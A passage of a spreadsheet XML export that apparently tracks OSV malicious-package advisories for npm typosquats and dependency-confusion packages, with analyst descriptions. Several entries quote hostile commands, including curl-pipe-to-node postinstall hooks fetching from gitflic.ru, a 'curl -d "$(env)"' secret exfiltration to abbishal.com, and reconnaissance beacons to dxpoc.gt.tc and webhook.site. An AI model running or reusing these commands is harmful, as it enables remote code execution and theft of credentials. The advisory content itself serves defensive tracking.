          <t>https://osv.dev/vulnerability/MAL-2026-17539</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17540</t>
        </is>
      </c>
      <c r="D197" s="5" t="inlineStr"/>
      <c r="E197" s="5" t="inlineStr"/>
      <c r="F197" s="5" t="inlineStr"/>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr">
        <is>
          <t>npm:@anngular/core</t>
        </is>
      </c>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr"/>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (93d2078e85dc301d6b0299c93ff5e0e5e2c717290e88f18de85fce6554f2d027)
Package name @anngular/core (double-n) impersonates @angular/core, copying its description 'Angular - the core framework' and author 'angular'. package.json declares a postinstall lifecycle script: `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`. On `npm install`, this unconditionally fetches an unpinned JavaScript payload from a non-publisher gitflic.ru repository (proxied through web.archive.org to evade host-based filtering) and pipes it directly into node, giving the operator of that gitflic.ru project arbitrary code execution on the installer's machine. The payload is not shipped with the package, is not integrity-pinned, and can be mutated at any time by whoever controls the gitflic.ru project.
</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17540</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17541</t>
        </is>
      </c>
      <c r="D198" s="5" t="inlineStr"/>
      <c r="E198" s="5" t="inlineStr"/>
      <c r="F198" s="5" t="inlineStr"/>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr">
        <is>
          <t>npm:@anuglar/core</t>
        </is>
      </c>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr"/>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5f23ef78cc88817166cff7f8fdf3f1839c610880d960d9394e286da232058f98)
Package name '@anuglar/core' is a one-character transposition of '@angular/core' and copies the legitimate package's description ('Angular - the core framework'), author ('angular'), and repository URL to impersonate it. The package.json postinstall lifecycle script runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, downloading arbitrary JavaScript from a third-party host (gitflic.ru, fetched via web.archive.org) and piping it directly into node for execution on `npm install`. The fetched code is unpinned, unhashed, and not shipped in the tarball, so its contents can change at any time and are executed with the privileges of the installing user. The script also references `ps` and `id` for host reconnaissance.
</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17541</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17542</t>
        </is>
      </c>
      <c r="D199" s="5" t="inlineStr"/>
      <c r="E199" s="5" t="inlineStr"/>
      <c r="F199" s="5" t="inlineStr"/>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr">
        <is>
          <t>npm:@inpeek/odata</t>
        </is>
      </c>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr"/>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dad085b4b3e089d6a6d4e6812c66a8b45f10d40bc4ab39ea7bd0ce850d17ed4b)
@inpeek/odata@99.99.100 is a dependency-confusion placeholder published to the public npm registry on the unregistered @inpeek scope with an inflated version (99.99.100) designed to outrank any internal release of the same name. The package.json declares a postinstall lifecycle hook that executes ping.js on `npm install`. ping.js performs an unconditional HTTPS GET to the hardcoded collector URL https://webhook.site/bec9d4b2-8f49-451e-84be-2681cb91ebf2, passing the installer's hostname (os.hostname()), platform (os.platform()), and Node.js version (process.version) as query parameters. index.js throws on require, so any accidental consumer breaks loudly after the postinstall beacon has already fired. The package self-labels as a bug-bounty research placeholder, but the install-time dataflow — automatic transmission of installer host identifiers to a third-party collector the installer did not opt into — is the dependency-confusion exploitation shape and reaches any installer whose tooling resolves @inpeek/* from the public registry.
</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17542</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17543</t>
        </is>
      </c>
      <c r="D200" s="5" t="inlineStr"/>
      <c r="E200" s="5" t="inlineStr"/>
      <c r="F200" s="5" t="inlineStr"/>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr">
        <is>
          <t>npm:@inpeek/odata-angular</t>
        </is>
      </c>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr"/>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (914508dbfa95a3d2cef5aef321a656215797f477c161a8c234e76256db6cac65)
@inpeek/odata-angular@99.99.102 is a dependency-confusion squat on the private @inpeek scope, published to the public npm registry at an inflated version (99.99.102) to win resolution against an internal package of the same name. package.json declares scripts.postinstall as 'node./ping.js'; ping.js issues an HTTPS GET to the third-party collector https://db1b65hgnouukn3qov9gta83zgkdao9dy.oast.me/ carrying os.hostname(), os.platform(), process.version, and the package name as query parameters. index.js throws on require, so the package has no legitimate library function; the only install-time effect is the beacon to the external OAST domain. Any CI job or developer workstation whose resolver picks @inpeek/* from the public registry executes the beacon on npm install and leaks host identifiers to an attacker-controlled destination, regardless of a 'bug bounty research' framing in the description.
</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17543</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17544</t>
        </is>
      </c>
      <c r="D201" s="5" t="inlineStr"/>
      <c r="E201" s="5" t="inlineStr"/>
      <c r="F201" s="5" t="inlineStr"/>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr">
        <is>
          <t>npm:@qngular/core</t>
        </is>
      </c>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr"/>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e83437986b94381cddff72267bc53907d980e1b14dbfef9123aa47f5ed664664)
Package `@qngular/core` is a one-character typosquat of `@angular/core` and copies the real package's description, author, and repository metadata. The `postinstall` lifecycle script in package.json runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`, fetching an opaque, non-publisher-controlled JavaScript payload from a third-party host (gitflic.ru via a web.archive.org proxy) and piping it unverified into `node`. This executes attacker-controlled code on the installer's machine during `npm install`.
</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17544</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17545</t>
        </is>
      </c>
      <c r="D202" s="5" t="inlineStr"/>
      <c r="E202" s="5" t="inlineStr"/>
      <c r="F202" s="5" t="inlineStr"/>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr">
        <is>
          <t>npm:abbishal-poc</t>
        </is>
      </c>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr"/>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f3d3f60fb75143a3cdfedea0c2f185e0556053cd458cd5e76cd5303bf406eb32)
On `npm install`, package.json's preinstall hook runs `sh./test.sh`, which uses character-split variable obfuscation (b=e, i=c, s=n, h=u, a=v, l=rl) to reconstruct and execute `curl -d "$(env)" https://abbishal.com/sh/poc`. The script dumps the installer's full process environment — which on CI/CD and developer hosts typically contains cloud credentials (AWS_*), publish tokens (NPM_TOKEN), source-control tokens (GITHUB_TOKEN) and other secrets — and POSTs the contents to the author-controlled domain abbishal.com. The destination is hardcoded and not caller-configurable. In-script comments explicitly describe evading npm's malware scanners, and the README's claims of 'no network requests' and 'no data collection' contradict the actual behavior.
</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17545</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17546</t>
        </is>
      </c>
      <c r="D203" s="5" t="inlineStr"/>
      <c r="E203" s="5" t="inlineStr"/>
      <c r="F203" s="5" t="inlineStr"/>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr">
        <is>
          <t>npm:aria-live-region-helper</t>
        </is>
      </c>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr"/>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (391a9a163273e36e3945f918ea720b8e10aa462b0aa603d4012b28c557c58570)
The package is advertised as an ARIA accessibility helper but ships thunderboltRegistry.js, which executes a top-level IIFE on module load. The IIFE runs shell reconnaissance commands via child_process.execSync (whoami, id, pwd, ifconfig/ip addr, cat /etc/hosts, hostname) and sends their output, together with a beacon containing Node version, process.platform, and PID, via HTTP GET requests to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package also exports factories under names matching internal Wix thunderbolt registry entry points (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) and includes a registry-manifest.min.json mapping those names to parastorage.com unpkg URLs, so that a build pipeline resolving any of those registry names to this package triggers the recon-exfiltration side effect on import. Neither the reconnaissance behavior nor the dxpoc.gt.tc destination is related to the package's advertised accessibility purpose.
</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17546</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17547</t>
        </is>
      </c>
      <c r="D204" s="5" t="inlineStr"/>
      <c r="E204" s="5" t="inlineStr"/>
      <c r="F204" s="5" t="inlineStr"/>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr">
        <is>
          <t>npm:css-at-scope-polyfill</t>
        </is>
      </c>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr"/>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c4d8d974b7fabf04fa662971cd8041fb76775bf5ed2902cbbffed0f881e2036d)
Package is published under a CSS-polyfill name but ships thunderboltRegistry.js, which exports Wix internal registry module names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) so that a build resolving any of those names will load this file. On require(), an IIFE runs child_process.execSync to collect `id`, `whoami`, `uname`, `ifconfig`/`ip addr`, and the contents of /etc/hosts, plus a beacon containing node version, platform, pid, and hostname, and POSTs the output via fetch to the hardcoded HTTP endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The payload clears any require.cache entries referencing 'thunderboltRegistry' and acquires child_process through three fallbacks, including instantiating a new Module via module.constructor to bypass mocks or sandboxes. The declared CSS-polyfill purpose has no relation to this behavior; the shape is a dependency-confusion squat against internal Wix modules.
</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17547</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17548</t>
        </is>
      </c>
      <c r="D205" s="5" t="inlineStr"/>
      <c r="E205" s="5" t="inlineStr"/>
      <c r="F205" s="5" t="inlineStr"/>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr">
        <is>
          <t>npm:css-ayucyz-polyfill</t>
        </is>
      </c>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr"/>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d8c7540d3981f510255434529f76a2ed9a24b0783e7e8e3369b41f71b93ebd1a)
On require, thunderboltRegistry.js runs an IIFE that acquires child_process via multiple fallbacks and executes shell commands (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts), then GETs the collected output along with the hostname, platform and Node version to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. One of the beacons is self-labeled beacon=rce-poc. The package presents itself as a CSS polyfill and exposes modules named thunderboltRegistry, siteAssetsRegistry, editorRegistry and corvidRegistry — internal Wix Thunderbolt names — behind a Proxy returning no-op functions, with registry-manifest.min.json pointing fake entries at a static.parastorage.com URL, so a consumer that resolves this package in place of the real Wix internals loads the exfiltration IIFE while the facade silently returns no-ops.
</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17548</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17549</t>
        </is>
      </c>
      <c r="D206" s="5" t="inlineStr"/>
      <c r="E206" s="5" t="inlineStr"/>
      <c r="F206" s="5" t="inlineStr"/>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr">
        <is>
          <t>npm:css-display-reading-polyfill</t>
        </is>
      </c>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr"/>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b397798b7209f1094c33dc3ed721d4a3ef0536065317bd06bae76e33dd505334)
The package ships payload.bundle.min.js, which on load runs an IIFE that invokes child_process.execSync to run id, whoami, and uname, collects os.hostname(), node version, process.platform, and pid, and transmits the results to the hardcoded collector https://webhook.site/5e52603d-f802-4a6f-b91b-43c3a5b45b6b via fetch and https.get. The published name impersonates an internal Wix thunderbolt module: shipped thunderbolt manifest JSON files declare this package as the loader entry for dozens of Wix component registry names (Container, StylableButton, MasterPage,...) and nine host registries (thunderboltRegistry, editorRegistry, corvidRegistry,...), with "shared":["payload.bundle.min.js"] and components mapped to that bundle. index.js is a benign stub; the exfil code lives entirely in the bundle, so any Wix runtime that resolves these internal registry names from this public package executes the host-reconnaissance payload. This is a dependency-confusion active attack: installer-side shell command output and host identifiers are sent to an attacker-controlled, non-first-party endpoint.
</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17549</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17550</t>
        </is>
      </c>
      <c r="D207" s="5" t="inlineStr"/>
      <c r="E207" s="5" t="inlineStr"/>
      <c r="F207" s="5" t="inlineStr"/>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr">
        <is>
          <t>npm:css-dwsawd-polyfill</t>
        </is>
      </c>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr"/>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1c370cda09695e44d06a44bc14d14817edadc047e4dad0314edcfc752be796e9)
The package name mimics a Wix thunderbolt polyfill and ships a registry-manifest.min.json that aliases legitimate @wix thunderbolt registry module names to thunderboltRegistry.js. On require, thunderboltRegistry.js runs an IIFE that uses child_process.execSync to execute shell reconnaissance (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts) and fetches http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f with the command outputs plus hostname, pid, platform, node version, and a site identifier as query parameters, tagged 'rce-poc'. A fallback path constructs a fresh Module instance to re-resolve child_process if the require cache is stubbed, ensuring execution. The destination is plain HTTP to an unrelated external host and is not caller-configurable.
</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17550</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17551</t>
        </is>
      </c>
      <c r="D208" s="5" t="inlineStr"/>
      <c r="E208" s="5" t="inlineStr"/>
      <c r="F208" s="5" t="inlineStr"/>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr">
        <is>
          <t>npm:css-gvqmfn-polyfill</t>
        </is>
      </c>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr"/>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ffb3f332a818748252e49dcf21ffb6949c531afd401ee697cc08ba00a067ae30)
css-gvqmfn-polyfill mimics Wix internal @wix/thunderbolt-* CSS polyfill naming and ships a Proxy-based cover stub that re-exports registry names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.) as no-op functions to appear functional. On require of thunderboltRegistry.js, an IIFE unconditionally executes `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `cat /etc/hosts` via child_process, collects os.hostname, Node version, platform, and pid, and sends the output together with an `rce-poc` beacon to the hardcoded attacker endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plain HTTP. The accompanying registry-manifest.min.json points sibling registries to parastorage.com URLs that do not host this file, consistent with a dependency-confusion lure targeting Wix build environments.
</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17551</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17552</t>
        </is>
      </c>
      <c r="D209" s="5" t="inlineStr"/>
      <c r="E209" s="5" t="inlineStr"/>
      <c r="F209" s="5" t="inlineStr"/>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr">
        <is>
          <t>npm:css-hgwctv-polyfill</t>
        </is>
      </c>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr"/>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ee1103a16c6f933686f07e8ce94068057f49e5cf2f0a6a9ccf01f2baeb7cfe95)
On require, thunderboltRegistry.js runs an immediately-invoked function that uses child_process.execSync to collect host identity and network reconnaissance from the installer's machine (`id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `/etc/hosts`), plus hostname, Node.js version, platform and pid, and transmits each result via fetch to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The package also exports Proxy stubs named thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry and ships a registry-manifest.min.json referencing parastorage.com, mimicking internal Wix thunderbolt build modules so the module auto-loads inside a Wix build and executes the reconnaissance payload. A CSS polyfill has no functional reason to execute shell commands, read /etc/hosts, or contact an external host.
</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17552</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
